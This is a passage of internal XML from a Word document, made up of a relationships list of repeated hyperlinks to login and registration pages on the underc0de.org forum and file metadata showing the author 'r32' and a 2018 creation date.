          <w:marBottom w:val="15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21281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2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nderc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register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underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId9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https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register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underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId9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underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=login" TargetMode="External"/><Relationship Id="rId94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s://underc0de.org/foro/index.php?action=register" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://underc0de.org/foro/index.php?action=registe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5CF73-D3A8-4CFD-BE11-39FF254AF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4195</Words>
  <Characters>23078</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>192</Lines>
  <Paragraphs>54</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company> </Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>27219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</dc:creator>
  <cp:lastModifiedBy>r32</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-20T18:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-20T18:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>